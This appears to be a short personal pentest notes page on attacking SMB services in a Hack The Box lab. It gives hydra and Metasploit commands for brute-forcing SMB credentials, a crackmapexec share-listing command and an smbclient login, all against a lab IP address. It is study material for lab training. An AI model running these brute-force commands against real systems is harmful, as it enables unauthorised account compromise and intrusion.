Flo Aberger | Cyber Notes Structured writeups for labs, CTFs, and security projects.

Attacking Network Services

SMB

Notes and commands for SMB.

2024-04-01
Tags passwordsattacking-network-servicessmb
Back to Pentest Notes Search Notes

Sambe/SMB

Brute Force credentials

  • Momothechi@htb[/htb]$ hydra -L user.list -P password.list smb://10.129.42.197

Possible Erros

  • [ERROR] invalid reply from target smb://10.129.42.197:445/

Fix:?

Is cause we can’t handle SMBv3 replies and need to update / recompile hydra or use msfconsole.

Msfconsole brute force SMB

  • msf6 > use auxiliary/scanner/smb/smb_login

  • Obviously in options set username lsit and password list for brute forcing.

Using Crackmap

  • Momothechi@htb[/htb]$ crackmapexec smb 10.129.42.197 -u “user” -p “password” –shares

Once we have credentials we can communicate with the server using smbclient

  • Momothechi@htb[/htb]$ smbclient -U user \\10.129.42.197\SHARENAME